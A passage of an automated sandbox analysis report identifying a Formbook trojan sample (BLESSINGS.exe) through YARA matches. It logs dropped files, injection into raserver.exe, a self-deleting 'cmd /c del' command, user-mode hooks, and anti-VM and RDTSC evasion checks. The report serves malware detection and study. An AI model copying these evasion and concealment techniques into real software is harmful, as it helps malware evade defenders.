          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EE197
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDF97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDFAA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exeBinary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: BLESSINGS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: BLESSINGS.exeVirustotal: Detection: 45%
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: BLESSINGS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exeStatic file information: File size 3427840 > 1048576
          Source: BLESSINGS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454B71 push es; iretd
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05450A2A push ds; ret
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054505E6 pushfd ; iretd
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454E9A push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0178D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0457D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ED856 push esi; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECEB5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF0B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF02 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF6C push eax; ret
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D98E4 second address: 00000000001D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D9B5E second address: 00000000001D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\BLESSINGS.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 401
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 9396
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 401 > 30
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 9396 > 30
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep count: 53 > 30
          Source: C:\Windows\explorer.exe TID: 5336Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6660Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: explorer.exe, 0000000A.00000000.458586378.0000000008540000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA,
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000002.701264945.0000000006302000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F2073 mov eax, dword ptr fs:[00000030h]
